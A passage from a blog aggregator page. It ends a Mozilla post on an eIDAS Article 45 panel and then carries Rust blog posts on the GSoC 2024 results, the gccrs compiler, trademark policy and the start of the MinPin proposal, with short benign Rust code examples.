Thomas Lohninger provided context on how Article 45 fits into the larger eIDAS framework. He explained that while eIDAS aims to secure the wider digital ecosystem, QWACs under Article 45 could erode trust in website security, affecting both European and global users.

Dennis Jackson, a member of Mozilla’s cryptography team, cautioned that without robust safeguards, Qualified Website Authentication Certificates (QWACs) could be misused, leading to an increased risk of fraud. He noted that the limited involvement of technical experts in drafting Article 45 resulted in significant gaps within the law. The version of Article 45 originally proposed in 2021 radically expanded the capabilities of EU governments to surveil their citizens by ensuring that cryptographic keys under government control could be used to intercept encrypted web traffic across the EU.

Why Extended Validation Certificates (EVs) Didn’t Work—and Why Article 45 Might Not Either

Alexis Hancock compared Article 45 to extended validation (EV) certificates, which were introduced years ago with similar intentions but ultimately failed to achieve their goals. EV certificates were designed to offer more information about the identity of websites but ended up being expensive and ineffective as most users didn’t even notice them.

Hancock cautioned that QWACs could suffer from the same problems. Instead of focusing on complex authentication mechanisms, she argued, the priority should be on improving encryption and keeping the internet secure for everyone, regardless of whether a website has paid for a specific type of certificate.

Balancing Security and Privacy: A Tough Trade-Off

A key theme was balancing online transparency with user privacy. All the panelists agreed that while identifying websites more clearly may have its advantages, it should not come at the expense of privacy and security. The risk is that requiring more authentication online could lead to reduced anonymity and greater potential for surveillance, undermining the principles of free expression and privacy on the internet.

The panelists also pointed out that Article 45 could lead to a fragmented internet, with different regions adopting conflicting rules for registering and asserting ownership of a website. This fragmentation would make it harder to maintain a secure and unified web, complicating global web security.

The Role of Web Browsers in Protecting Users

Web browsers, like Firefox, play a crucial role in protecting users. The panelists stressed that browsers have a responsibility to push back against policies that could compromise user privacy or weaken internet security.

Looking Ahead: What’s Next for eIDAS and Web Security?

Thomas Lohninger raised the possibility of legal challenges to Article 45. If the regulation is implemented in a way that violates privacy rights or data protection laws, it could be contested under the EU’s legal frameworks, including the General Data Protection Regulation (GDPR) and the ePrivacy Directive. Such battles could be lengthy and complex, however, underscoring the need for continued advocacy.

As the panel drew to a close, the speakers emphasized that while the recent changes to Article 45 represent progress, the fight is far from over. The implementation of eIDAS continues to evolve, and it’s crucial that stakeholders, including browsers, cybersecurity experts, and civil society groups, remain vigilant in advocating for a secure and open internet.

The consensus from the panel was clear: as long as threats to encryption and web security exist, the community must stay engaged in these debates. Scrutinizing policies like eIDAS is essential to ensure they truly serve the interests of internet users, not just large institutions or governments.

The panelists concluded by calling for ongoing collaboration between policymakers, technical experts, and the public to protect the open web and ensure that any changes to digital identity laws enhance, rather than undermine, security and privacy for all.


You can watch the panel discussion here.

The post Behind the Scenes of eIDAS: A Look at Article 45 and Its Implications appeared first on Open Policy & Advocacy.

The Rust Programming Language BlogGoogle Summer of Code 2024 results

As we have previously announced, the Rust Project participated in Google Summer of Code (GSoC) for the first time this year. Nine contributors have been tirelessly working on their exciting projects for several months. The projects had various durations; some of them ended in August, while the last one concluded in mid-October. Now that the final reports of all the projects have been submitted, we can happily announce that all nine contributors have passed the final review! That means that we have deemed all of their projects to be successful, even though they might not have fulfilled all of their original goals (but that was expected).

We had a lot of great interactions with our GSoC contributors, and based on their feedback, it seems that they were also quite happy with the GSoC program and that they had learned a lot. We are of course also incredibly grateful for all their contributions - some of them have even continued contributing after their projects ended, which is really awesome. In general, we think that Google Summer of Code 2024 was a success for the Rust Project, and we are looking forward to participating in GSoC (or similar programs) again in the near future. If you are interested in becoming a (GSoC) contributor, check out our project idea list.

Below you can find a brief summary of each of our GSoC 2024 projects, including feedback from the contributors and mentors themselves. You can find more information about the projects here.

Adding lint-level configuration to cargo-semver-checks

cargo-semver-checks is a tool designed for automatically detecting semantic versioning conflicts, which is planned to one day become a part of Cargo itself. The goal of this project was to enable cargo-semver-checks to ship additional opt-in lints by allowing users to configure which lints run in which cases, and whether their findings are reported as errors or warnings. Max achieved this goal by implementing a comprehensive system for configuring cargo-semver-checks lints directly in the Cargo.toml manifest file. He also extensively discussed the design with the Cargo team to ensure that it is compatible with how other Cargo lints are configured, and won't present a future compatibility problem for merging cargo-semver-checks into Cargo.

Predrag, who is the author of cargo-semver-checks and who mentored Max on this project, was very happy with his contributions that even went beyond his original project scope:

He designed and built one of our most-requested features, and produced design prototypes of several more features our users would love. He also observed that writing quality CLI and functional tests was hard, so he overhauled our test system to make better tests easier to make. Future work on cargo-semver-checks will be much easier thanks to the work Max put in this summer.

Great work, Max!

Implementation of a faster register allocator for Cranelift

The Rust compiler can use various backends for generating executable code. The main one is of course the LLVM backend, but there are other backends, such as GCC, .NET or Cranelift. Cranelift is a code generator for various hardware targets, essentially something similar to LLVM. The Cranelift backend uses Cranelift to compile Rust code into executable code, with the goal of improving compilation performance, especially for debug (unoptimized) builds. Even though this backend can already be faster than the LLVM backend, we have identified that it was slowed down by the register allocator used by Cranelift.

Register allocation is a well-known compiler task where the compiler decides which registers should hold variables and temporary expressions of a program. Usually, the goal of register allocation is to perform the register assignment in a way that maximizes the runtime performance of the compiled program. However, for unoptimized builds, we often care more about the compilation speed instead.
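
As a rough illustration of that trade-off (and emphatically not fastalloc itself), a "fast" allocator can hand out physical registers in order and spill everything else to the stack, skipping the liveness analysis an optimizing allocator would perform. A toy Rust sketch:

    // Deliberately naive: assign the first N virtual registers to physical
    // registers and spill the rest, with no liveness or interference analysis.
    #[derive(Debug)]
    enum Location {
        Register(usize),
        StackSlot(usize),
    }

    fn allocate(num_virtual_regs: usize, num_physical_regs: usize) -> Vec<Location> {
        (0..num_virtual_regs)
            .map(|vreg| {
                if vreg < num_physical_regs {
                    Location::Register(vreg)
                } else {
                    Location::StackSlot(vreg - num_physical_regs)
                }
            })
            .collect()
    }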

Demilade has thus proposed to implement a new Cranelift register allocator called fastalloc, with the goal of making it as fast as possible, at the cost of the quality of the generated code. He was very well prepared; in fact, he had a prototype implementation ready even before his GSoC project started! However, register allocation is a complex problem, and it took several months to finish the implementation and optimize it as much as possible. Demilade also made extensive use of fuzzing to make sure that his allocator is robust even in the presence of various edge cases.

Once the allocator was ready, Demilade benchmarked the Cranelift backend both with the original and his new register allocator using our compiler benchmark suite. And the performance results look awesome! With his faster register allocator, the Rust compiler executes up to 18% fewer instructions across several benchmarks, including complex ones like performing a debug build of Cargo itself. Note that this is an end-to-end performance improvement of the time needed to compile a whole crate, which is really impressive. If you would like to examine the results in more detail or even run the benchmark yourself, check out Demilade's final report, which includes detailed instructions on how to reproduce the benchmark.

Apart from having the potential to speed up compilation of Rust code, the new register allocator can also be useful for other use cases, as it can be used in Cranelift on its own (outside the Cranelift codegen backend). What can we say other than that we are very happy with Demilade's work! Note that the new register allocator is not yet available in the Cranelift codegen backend out of the box, but we expect that it will eventually become the default choice for debug builds and that it will thus make compilation of Rust crates using the Cranelift backend faster in the future.

Improve Rust benchmark suite

This project was relatively loosely defined, with the overarching goal of improving the user interface of the Rust compiler benchmark suite. Eitaro tackled this challenge from various angles at once. He improved the visualization of runtime benchmarks, which were previously a second-class citizen in the benchmark suite, by adding them to our dashboard and by implementing historical charts of runtime benchmark results, which help us figure out how a given benchmark behaves over a longer time span.

Another improvement that he worked on was embedding a profiler trace visualizer directly within the rustc-perf website. This was a challenging task, which required him to evaluate several visualizers and figure out how to include them within the source code of the benchmark suite in a non-disruptive way. In the end, he managed to integrate Perfetto within the suite website, and also performed various optimizations to improve the performance of loading compilation profiles.

Last, but not least, Eitaro also created a completely new user interface for the benchmark suite, which runs entirely in the terminal. Using this interface, Rust compiler contributors can examine the performance of the compiler without having to start the rustc-perf website, which can be challenging to deploy locally.

Apart from the mentioned contributions, Eitaro also made a lot of other smaller improvements to various parts of the benchmark suite. Thank you for all your work!

Move cargo shell completions to Rust

Cargo's completion scripts have been hand-maintained and frequently broke when changed. The goal for this effort was to have the completions automatically generated from the definition of Cargo's command line, with extension points for dynamically generated results.

shanmu took the prototype for dynamic completions in clap (the command-line parser used by Cargo), got it working and tested for common shells, and extended the parser to cover more cases. They then added extension points for CLIs to provide custom completion results that can be generated on the fly.

In the next phase, shanmu added this to nightly Cargo and added different custom completers to match what the handwritten completions do. As an example, with this feature enabled, when you type cargo test --test= and hit the Tab key, your shell will autocomplete all the test targets in your current Rust crate! If you are interested, see the instructions for trying this out. The link also lists where you can provide feedback.
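
For readers unfamiliar with the underlying idea, here is a hedged Rust sketch of generating completions from the same clap definition that parses the CLI, using clap_complete's long-standing static generator. The dynamic completion machinery shanmu worked on builds on newer clap features and differs in detail; this only illustrates the "one source of truth" principle.

    use clap::{Arg, Command};
    use clap_complete::{generate, Shell};
    use std::io;

    fn main() {
        // A tiny stand-in for Cargo's real command-line definition.
        let mut cmd = Command::new("cargo")
            .subcommand(Command::new("test").arg(Arg::new("test").long("test")));

        // Emit a Bash completion script derived from that definition.
        generate(Shell::Bash, &mut cmd, "cargo", &mut io::stdout());
    }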

You can also check out the following issues to find out what is left before this can be stabilized:

Rewriting esoteric, error-prone makefile tests using robust Rust features

The Rust compiler has several test suites that make sure that it is working correctly under various conditions. One of these suites is the run-make test suite, whose tests were previously written using Makefiles. However, this setup posed several problems. It was not possible to run the suite on the Tier 1 Windows MSVC target (x86_64-pc-windows-msvc) and getting it running on Windows at all was quite challenging. Furthermore, the syntax of Makefiles is quite esoteric, which frequently caused mistakes to go unnoticed even when reviewed by multiple people.

Julien helped to convert the Makefile-based run-make tests into plain Rust-based tests, supported by a test support library called run_make_support. However, it was not a trivial "rewrite this in Rust" kind of deal. In this project, Julien:

  • Significantly improved the test documentation;
  • Fixed multiple bugs that were present in the Makefile versions and had gone unnoticed for years -- some tests were never testing anything or silently ignored failures, so even if the subject being tested regressed, these tests would not have caught that;
  • Added to and improved the test support library API and implementation; and
  • Improved code organization within the tests to make them easier to understand and maintain.
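
To give a flavor of the new style, here is a hedged sketch of what a minimal Rust-based run-make test might look like with run_make_support; the helper names are written from memory and may not exactly match the current library.

    // A Rust rmake-style test: compile a fixture crate and assert the build
    // succeeds, replacing what used to be a Makefile rule invoking $(RUSTC).
    use run_make_support::rustc;

    fn main() {
        rustc().input("main.rs").run();
    }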

Just to give you an idea of the scope of his work, he has ported almost 250 Makefile tests over the span of his GSoC project! If you like puns, check out the branch names of Julien's PRs, as they are simply fantestic.

As a result, Julien has significantly improved the robustness of the run-make test suite, and improved the ergonomics of modifying existing run-make tests and authoring new run-make tests. Multiple contributors have expressed that they were more willing to work with the Rust-based run-make tests over the previous Makefile versions.

The vast majority of run-make tests now use the Rust-based test infrastructure, with a few holdouts remaining due to various quirks. After these are resolved, we can finally rip out the legacy Makefile test infrastructure.

Rewriting the Rewrite trait

rustfmt is a Rust code formatter that is widely used across the Rust ecosystem thanks to its direct integration within Cargo. Usually, you just run cargo fmt and you can immediately enjoy a properly formatted Rust project. However, there are edge cases in which rustfmt can fail to format your code. That is not such an issue on its own, but it becomes more problematic when it fails silently, without giving the user any context about what went wrong. This is what was happening in rustfmt, as many functions simply returned an Option instead of a Result, which made it difficult to add proper error reporting.

The goal of SeoYoung's project was to perform a large internal refactoring of rustfmt that would allow tracking context about what went wrong during reformatting. In turn, this would enable turning silent failures into proper error messages that could help users examine and debug what went wrong, and could even allow rustfmt to retry formatting in more situations.

At first, this might sound like an easy task, but performing such large-scale refactoring within a complex project such as rustfmt is not so simple. SeoYoung needed to come up with an approach to incrementally apply these refactors, so that they would be easy to review and wouldn't impact the entire code base at once. She introduced a new trait that enhanced the original Rewrite trait, and modified existing implementations to align with it. She also had to deal with various edge cases that we hadn't anticipated before the project started. SeoYoung was meticulous and systematic with her approach, and made sure that no formatting functions or methods were missed.
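
The shape of the refactoring is easier to see in code. The following sketch shows the general Option-to-Result pattern being described; the names RewriteError, RewriteResult, and RewriteExt are illustrative and may not match rustfmt's actual internals.

    // Before: a failure is just `None`, with no context for error reporting.
    trait Rewrite {
        fn rewrite(&self) -> Option<String>;
    }

    // After: the failure explains itself. A default method keeps old
    // implementations usable while call sites migrate incrementally.
    #[derive(Debug)]
    enum RewriteError {
        ExceedsMaxWidth { configured_width: usize },
        MacroFailure { msg: String },
        Unknown,
    }

    type RewriteResult = Result<String, RewriteError>;

    trait RewriteExt: Rewrite {
        fn rewrite_result(&self) -> RewriteResult {
            self.rewrite().ok_or(RewriteError::Unknown)
        }
    }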

Ultimately, the refactor was a success! Internally, rustfmt now keeps track of more information related to formatting failures, including errors that it could not possibly report before, such as issues with macro formatting. It also has the ability to provide information about source code spans, which helps identify parts of code that require spacing adjustments when exceeding the maximum line width. We don't yet propagate that additional failure context as user facing error messages, as that was a stretch goal that we didn't have time to complete, but SeoYoung has expressed interest in continuing to work on that as a future improvement!

Apart from working on error context propagation, SeoYoung also made various other improvements that enhanced the overall quality of the codebase, and she was also helping other contributors understand rustfmt. Thank you for making the foundations of formatting better for everyone!

Rust to .NET compiler - add support for compiling & running cargo tests

As was already mentioned above, the Rust compiler can be used with various codegen backends. One of these is the .NET backend, which compiles Rust code to the Common Intermediate Language (CIL), which can then be executed by the .NET Common Language Runtime (CLR). This backend allows interoperability of Rust and .NET (e.g. C#) code, in an effort to bring these two ecosystems closer together.

At the start of this year, the .NET backend was already able to compile complex Rust programs, but it was still lacking certain crucial features. The goal of this GSoC project, implemented by Michał, who is in fact the sole author of the backend, was to extend the functionality of this backend in various areas. As a target goal, he set out to extend the backend so that it could be used to run tests using the cargo test command. Even though it might sound trivial, properly compiling and running the Rust test harness is non-trivial, as it makes use of complex features such as dynamic trait objects, atomics, panics, unwinding or multithreading. These features were especially tricky to implement in this codegen backend, because the LLVM intermediate representation (IR) and CIL have fundamental differences, and not all LLVM intrinsics have .NET equivalents.

However, this did not stop Michał. He has been working on this project tirelessly, implementing new features, fixing various issues and learning more about the compiler's internals every day. He has also been documenting his journey with (almost) daily updates on Zulip, which were fascinating to read. Once he reached his original goal, he moved the goalposts up another level and attempted to run the compiler's own test suite using the .NET backend. This helped him uncover additional edge cases and also led to a refactoring of the whole backend that resulted in significant performance improvements.

By the end of the GSoC project, the .NET backend was able to properly compile and run almost 90% of the standard library core and std test suite. That is an incredibly impressive number, since the suite contains thousands of tests, some of which are quite arcane. Michał's pace has not slowed down even after the project ended, and he is still continuously improving the backend. Oh, and did we already mention that his backend also has experimental support for emitting C code, effectively acting as a C codegen backend?! Michał has been very busy over the summer.

We thank Michał for all his work on the .NET backend, as it was truly inspirational, and led to fruitful discussions that were relevant also to other codegen backends. Michał's next goal is to get his backend upstreamed and create an official .NET compilation target, which could open up the doors to Rust becoming a first-class citizen in the .NET ecosystem.

Sandboxed and deterministic proc macro using WebAssembly

Rust procedural (proc) macros are currently run as native code that gets compiled to a shared object which is loaded directly into the process of the Rust compiler. Because of this design, these macros can do whatever they want, for example arbitrarily access the filesystem or communicate through a network. This has not only obvious security implications, but it also affects performance, as this design makes it difficult to cache proc macro invocations. Over the years, there have been various discussions about making proc macros more hermetic, for example by compiling them to WebAssembly modules, which can be easily executed in a sandbox. This would also open the possibility of distributing precompiled versions of proc macros via crates.io, to speed up fresh builds of crates that depend on proc macros.
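
Conceptually, the sandboxed design can be pictured with a tiny sketch; none of these types exist in rustc, and they are only meant to show that a Wasm-hosted macro would see nothing but the token bytes it is handed, which is also what would make its expansions cacheable.

    // Purely conceptual: a sandboxed macro host sees serialized tokens in and
    // serialized tokens out, with no filesystem or network access.
    struct SerializedTokens(Vec<u8>);

    trait MacroSandbox {
        // Run one proc-macro invocation inside the sandbox.
        fn expand(&mut self, input: SerializedTokens) -> Result<SerializedTokens, String>;
    }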

The goal of this project was to examine what it would take to implement WebAssembly module support for proc macros and to create a prototype of this idea. We knew this would be a very ambitious project, especially since Apurva did not have prior experience with contributing to the Rust compiler, and because proc macro internals are very complex. Nevertheless, some progress was made. With the help of his mentor, David, Apurva was able to create a prototype that can load WebAssembly code into the compiler via a shared object. Some work was also done to make use of the existing TokenStream serialization and deserialization code in the compiler's proc_macro crate.

Even though this project did not fulfill its original goals and more work will be needed in the future to get a functional prototype of WebAssembly proc macros, we are thankful for Apurva's contributions. The WebAssembly loading prototype is a good start, and Apurva's exploration of proc macro internals should serve as a useful reference for anyone working on this feature in the future. Going forward, we will try to describe more incremental steps for our GSoC projects, as this project was perhaps too ambitious from the start.

Tokio async support in Miri

miri is an interpreter that can find possible instances of undefined behavior in Rust code. It is being used across the Rust ecosystem, but previously it was not possible to run it on any non-trivial programs that use tokio (those that ever await on anything), due to a fundamental missing feature: support for the epoll syscall on Linux (and similar APIs on other major platforms).

Tiffany implemented the basic epoll operations needed to cover the majority of the tokio test suite, by crafting pure libc code examples that exercised those epoll operations, and then implementing their emulation in miri itself. At times, this required refactoring core miri components like file descriptor handling, as they were originally not created with syscalls like epoll in mind.
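
Below is a minimal sketch of the kind of "pure libc" probe described above, assuming the libc crate; the real test cases differ in detail, but this is their general shape: create an epoll instance, register the read end of a pipe, make it readable, and wait for the event.

    fn main() {
        unsafe {
            // A pipe gives us one readable and one writable file descriptor.
            let mut fds = [0i32; 2];
            assert_eq!(libc::pipe(fds.as_mut_ptr()), 0);

            let epfd = libc::epoll_create1(0);
            assert!(epfd >= 0);

            // Register interest in readability of the pipe's read end.
            let mut ev = libc::epoll_event {
                events: libc::EPOLLIN as u32,
                u64: fds[0] as u64,
            };
            assert_eq!(libc::epoll_ctl(epfd, libc::EPOLL_CTL_ADD, fds[0], &mut ev), 0);

            // Make the read end readable, then ask epoll about it.
            let byte = 1u8;
            libc::write(fds[1], &byte as *const u8 as *const libc::c_void, 1);

            let mut ready = [libc::epoll_event { events: 0, u64: 0 }];
            let n = libc::epoll_wait(epfd, ready.as_mut_ptr(), 1, 1000);
            assert_eq!(n, 1);
        }
    }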

To everyone's surprise (though probably not to tokio-internals experts), once these core epoll operations were finished, operations like async file reading and writing started working in miri out of the box! Due to the limitations of non-blocking file operations offered by operating systems, tokio wraps these file operations in dedicated threads, which was already supported by miri.

Once Tiffany had finished the project, including stretch goals like implementing async file operations, she proceeded to contact the tokio maintainers and worked with them to run miri on most tokio tests in CI. And we have good news: so far no soundness problems have been discovered! Tiffany has become a regular contributor to miri, focusing on continuing to expand the set of supported file descriptor operations. We thank her for all her contributions!

Conclusion

We are grateful that we could have been a part of the Google Summer of Code 2024 program, and we would also like to extend our gratitude to all our contributors! We are looking forward to joining the GSoC program again next year.

The Rust Programming Language Bloggccrs: An alternative compiler for Rust

This is a guest post from the gccrs project, at the invitation of the Rust Project, to clarify the relationship with the Rust Project and the opportunities for collaboration.

gccrs is a work-in-progress alternative compiler for Rust being developed as part of the GCC project. GCC is a collection of compilers for various programming languages that all share a common compilation framework. You may have heard about gccgo, gfortran, or g++, which are all binaries within that project, the GNU Compiler Collection. The aim of gccrs is to add support for the Rust programming language to that collection, with the goal of having the exact same behavior as rustc.

First and foremost, gccrs was started as a project because it is fun. Compilers are incredibly rewarding pieces of software, and are great fun to put together. The project was started back in 2014, before Rust 1.0 was released, but was quickly put aside due to the shifting nature of the language back then. Around 2019, work on the compiler started again, led by Philip Herron and funded by Open Source Security and Embecosm. Since then, we have kept steadily progressing towards support for the Rust language as a whole, and our team has kept growing with around a dozen contributors working regularly on the project. We have participated in the Google Summer of Code program for the past four years, and multiple students have joined the effort.

The main goal of gccrs is to provide an alternative option for compiling Rust. GCC is an old project, as it was first released in 1987. Over the years, it has accumulated numerous contributions and support for multiple targets, including some not supported by LLVM, the main backend used by rustc. A practical example of that reach is the homebrew Dreamcast scene, where passionate engineers develop games for the Dreamcast console. Its processor architecture, SuperH, is supported by GCC but not by LLVM. This means that Rust cannot be used on those platforms, except through efforts like gccrs or the rustc_codegen_gcc backend - whose main differences will be explained later.

GCC also benefits from the decades of software written in unsafe languages. As such, a large number of safety features have been developed for the project as external plugins, or even within the project as static analyzers. These analyzers and plugins are executed on GCC's internal representations, meaning that they are language-agnostic and can thus be used on all the programming languages supported by GCC. Likewise, many GCC plugins are used for increasing the safety of critical projects such as the Linux kernel, which has recently gained support for the Rust programming language. This makes gccrs a useful tool for analyzing unsafe Rust code, and more generally Rust code that has to interact with existing C code. We also want gccrs to be a useful tool for rustc itself by helping flesh out the Rust specification effort with a unique viewpoint - that of a tool trying to replicate another's functionality, oftentimes through careful experimentation and source reading where the existing documentation did not go into enough detail. We are also in the process of developing various tools around gccrs and rustc, for the sole purpose of ensuring gccrs is as correct as rustc - which could help in discovering surprising behavior, unexpected functionality, or unspoken assumptions.

We would like to point out that our goal in aiding the Rust specification effort is not to turn it into a document for certifying alternative compilers as "Rust compilers" - while we believe that the specification will be useful to gccrs, our main goal is to contribute to it, by reviewing and adding to it as much as possible.

Furthermore, the project is still "young", and still requires a huge amount of work. There are a lot of places to make your mark, and a lot of easy things to work on for contributors interested in compilers. We have strived to create a safe, fun, and interesting space for all of our team and our GSoC students. We encourage anyone interested to come chat with us on our various communication platforms, and offer mentorship for you to learn how to contribute to the project and to compilers in general.

Maybe more importantly however, there is a number of things that gccrs is NOT for. The project has multiple explicit non-goals, which we value just as highly as our goals.

The most crucial of these non-goals is for gccrs not to become a gateway for an alternative or extended Rust-like programming language. We do not wish to create a GNU-specific version of Rust, with different semantics or slightly different functionality. gccrs is not a way to introduce new Rust features, and will not be used to circumvent the RFC process - which we will be using, should we want to see something introduced to Rust. Rust is not C, and we do not intend to introduce subtle differences in standard by making some features available only to gccrs users. We know about the pain caused by compiler-specific standards, and have learned from the history of older programming languages.

We do not want gccrs to be a competitor to the rustc_codegen_gcc backend. While both projects will effectively achieve the same goal, which is to compile Rust code using the GCC compiler framework, there are subtle differences in what each of these projects will unlock for the language. For example, rustc_codegen_gcc makes it easy to benefit from all of rustc's amazing diagnostics and helpful error messages, and makes Rust easily usable on GCC-specific platforms. On the other hand, it requires rustc to be available in the first place, whereas gccrs is part of a separate project entirely. This is important for some users and core Linux developers for example, who believe that having the ability to compile the entire kernel (C and Rust parts) using a single compiler is essential. gccrs can also offer more plugin entrypoints by virtue of it being its own separate GCC frontend. It also allows Rust to be used on GCC-specific platforms with an older GCC where libgccjit is not available. Nonetheless, we are very good friends with the folks working on rustc_codegen_gcc, and have helped each other multiple times, especially in dealing with the patch-based contribution process that GCC uses.

All of this ties into a much more global goal, which we could summarize as the following: We do not want to split the Rust ecosystem. We want gccrs to help the language reach even more people, and even more platforms.

To ensure that, we have taken multiple measures to make sure the values of the Rust project are respected and exposed properly. One of the features we feel most strongly about is the addition of a very annoying command line flag to the compiler, -frust-incomplete-and-experimental-compiler-do-not-use. Without it, you are not able to compile any code with gccrs, and the compiler will output the following error message:

crab1: fatal error: gccrs is not yet able to compile Rust code properly. Most of the errors produced will be the fault of gccrs and not the crate you are trying to compile. Because of this, please report errors directly to us instead of opening issues on said crate's repository.

Our github repository: https://github.com/rust-gcc/gccrs

Our bugzilla tracker: https://gcc.gnu.org/bugzilla/buglist.cgi?bug_status=__open__&component=rust&product=gcc

If you understand this, and understand that the binaries produced might not behave accordingly, you may attempt to use gccrs in an experimental manner by passing the following flag:

-frust-incomplete-and-experimental-compiler-do-not-use

or by defining the following environment variable (any value will do)

GCCRS_INCOMPLETE_AND_EXPERIMENTAL_COMPILER_DO_NOT_USE

For cargo-gccrs, this means passing

GCCRS_EXTRA_ARGS="-frust-incomplete-and-experimental-compiler-do-not-use"

as an environment variable.

Until the compiler can compile correct Rust and, most importantly, reject incorrect Rust, we will be keeping this command line option in the compiler. The hope is that it will prevent users from potentially annoying existing Rust crate maintainers with issues about code not compiling, when it is most likely our fault for not having implemented part of the language yet. Our goal of creating an alternative compiler for the Rust language must not have a negative effect on any member of the Rust community. Of course, this command line flag is not to the taste of everyone, and there has been significant pushback to its presence... but we believe it to be a good representation of our main values.

In a similar vein, gccrs separates itself from the rest of the GCC project by not using a mailing list as its main mode of communication. The compiler we are building will be used by the Rust community, and we believe we should make it easy for that community to get in touch with us and report the problems they encounter. Since Rustaceans are used to GitHub, this is also the development platform we have been using for the past five years. Similarly, we use a Zulip instance as our main communication platform, and encourage anyone wanting to chat with us to join it. Note that we still have a mailing list, as well as an IRC channel (gcc-rust@gcc.gnu.org and #gccrust on oftc.net), where all are welcome.

To further ensure that gccrs does not create friction in the ecosystem, we want to be extremely careful about the finer details of the compiler, which to us means reusing rustc components where possible, sharing effort on those components, and communicating extensively with Rust experts in the community. Two Rust components are already in use by gccrs: a slightly older version of polonius, the next-generation Rust borrow-checker, and the rustc_parse_format crate of the compiler. There are multiple reasons for reusing these crates, with the main one being correctness. Borrow checking is a complex topic and a pillar of the Rust programming language. Having subtle differences between rustc and gccrs regarding the borrow rules would be annoying and unproductive to users - but by making an effort to start integrating polonius into our compilation pipeline, we help ensure that the results we produce will be equivalent to rustc. You can read more about the various components we use, and we plan to reuse even more here. We would also like to contribute to the polonius project itself and help make it better if possible. This cross-pollination of components will obviously benefit us, but we believe it will also be useful for the Rust project and ecosystem as a whole, and will help strengthen these implementations.

Reusing rustc components could also be extended to other areas of the compiler: Various components of the type system, such as the trait solver, an essential and complex piece of software, could be integrated into gccrs. Simpler things such as parsing, as we have done for the format string parser and inline assembly parser, also make sense to us. They will help ensure that the internal representation we deal with will correspond to the one expected by the Rust standard library.

On a final note, we believe that one of the most important steps we could take to prevent breakage within the Rust ecosystem is to further improve our relationship with the Rust community. The amount of help we have received from Rust folks is great, and we think gccrs can be an interesting project for a wide range of users. We would love to hear about your hopes for the project and your ideas for reducing ecosystem breakage or lowering friction with the crates you have published. We had a great time chatting about gccrs at RustConf 2024, and everyone's interest in the project was heartwarming. Please get in touch with us if you have any ideas on how we could further contribute to Rust.

The Rust Programming Language BlogNext Steps on the Rust Trademark Policy

As many of you know, the Rust language trademark policy has been the subject of an extended revision process dating back to 2022. In 2023, the Rust Foundation released an updated draft of the policy for input following an initial survey about community trademark priorities from the previous year along with review by other key stakeholders, such as the Project Directors. Many members of our community were concerned about this initial draft and shared their thoughts through the feedback form. Since then, the Rust Foundation has continued to engage with the Project Directors, the Leadership Council, and the wider Rust project (primarily via all@) for guidance on how to best incorporate as much feedback as possible.

After extensive discussion, we are happy to circulate an updated draft with the wider community today for final feedback. An effective trademark policy for an open source community should reflect our collective priorities while remaining legally sound. While the revised trademark policy cannot perfectly address every individual perspective on this important topic, its goal is to establish a framework to help guide appropriate use of the Rust trademark and reflect as many common values and interests as possible. In short, this policy is designed to steer our community toward a shared objective: to maintain and protect the integrity of the Rust programming language.

The Leadership Council is confident that this updated version of the policy has addressed the prevailing concerns about the initial draft and honors the variety of voices that have contributed to its development. Thank you to those who took the time to submit well-considered feedback for the initial draft last year or who otherwise participated in this long-running process to update our policy to continue to satisfy our goals.

Please review the updated Rust trademark policy here, and share any critical concerns you might have via this form by November 20, 2024. The Foundation has also published a blog post which goes into more detail on the changes made so far. The Leadership Council and Project Directors look forward to reviewing concerns raised and approving any final revisions prior to an official update of the policy later this year.

Niko MatsakisMinPin: yet another pin proposal

This post floats a variation of boats’ UnpinCell proposal that I’m calling MinPin.1 MinPin’s goal is to integrate Pin into the language in a “minimally disruptive” way2 – and in particular a way that is fully backwards compatible. Unlike Overwrite, MinPin does not attempt to make Pin and &mut “play nicely” together. It does however leave the door open to add Overwrite in the future, and I think helps to clarify the positives and negatives that Overwrite would bring.

TL;DR: Key design decisions

Here is a brief summary of MinPin’s rules

  • The pinned keyword can be used to get pinned variations of things (a small sketch in today’s Rust follows this list):
    • In types, pinned P is equivalent to Pin<P>, so pinned &mut T and pinned Box<T> are equivalent to Pin<&mut T> and Pin<Box<T>> respectively.
    • In function signatures, pinned &mut self can be used instead of self: Pin<&mut Self>.
    • In expressions, pinned &mut $place is used to get a pinned &mut that refers to the value in $place.
  • The Drop trait is modified to have fn drop(pinned &mut self) instead of fn drop(&mut self).
    • However, impls of Drop are still permitted (even encouraged!) to use fn drop(&mut self), but it means that your type will not be able to use (safe) pin-projection. For many types that is not an issue; for futures or other “address sensitive” types, you should use fn drop(pinned &mut self).
  • The rules for field projection from a s: pinned &mut S reference are based on whether or not Unpin is implemented:
    • Projection is always allowed for fields whose type implements Unpin.
    • For fields whose types are not known to implement Unpin:
      • If the struct S is Unpin, &mut projection is allowed but not pinned &mut.
      • If the struct S is !Unpin and does not have a fn drop(&mut self) method, pinned &mut projection is allowed but not &mut.
      • If the type checker does not know whether S is Unpin or not, or if the type S has a Drop impl with fn drop(&mut self), neither form of projection is allowed for fields that are not Unpin.
  • There is a type struct Unpinnable<T> { value: T } that always implements Unpin.
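
To make these shorthands concrete, here is a minimal sketch in today’s stable Rust of what they map onto (Message and shout are made-up names used only for illustration):

use std::pin::{pin, Pin};

struct Message {
    text: String,
}

impl Message {
    // MinPin: `fn shout(pinned &mut self)`; today: `self: Pin<&mut Self>`.
    fn shout(self: Pin<&mut Self>) {
        println!("{}!", self.text);
    }
}

fn main() {
    // MinPin's `pinned Box<T>` is today's `Pin<Box<T>>`.
    let mut boxed: Pin<Box<Message>> = Box::pin(Message { text: "hi".into() });
    boxed.as_mut().shout();

    // MinPin's `pinned &mut $place` is roughly today's `pin!` plus a re-borrow.
    let mut local: Pin<&mut Message> = pin!(Message { text: "there".into() });
    local.as_mut().shout();
}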

Design axioms

Before I go further I want to layout some of my design axioms (beliefs that motivate and justify my design).

  • Pin is part of the Rust language. Despite Pin being entirely a “library-based” abstraction at present, it is very much a part of the language semantics, and it deserves first-class support. It should be possible to create pinned references and do pin projections in safe Rust.
  • Pin is its own world. Pin is only relevant in specific use cases, like futures or in-place linked lists.
  • Pin should have zero-conceptual-cost. Unless you are writing a Pin-using abstraction, you shouldn’t have to know or think about pin at all.
  • Explicit is possible. Automatic operations are nice but it should always be possible to write operations explicitly when needed.
  • Backwards compatible. Existing code should continue to compile and work.

Frequently asked questions

For the rest of the post I’m just going to go into FAQ mode.

I see the rules, but can you summarize how MinPin would feel to use?

Yes. I think the rule of thumb would be this. For any given type, you should decide whether your type cares about pinning or not.

Most types do not care about pinning. They just go on using &self and &mut self as normal. Everything works as today (this is the “zero-conceptual-cost” goal).

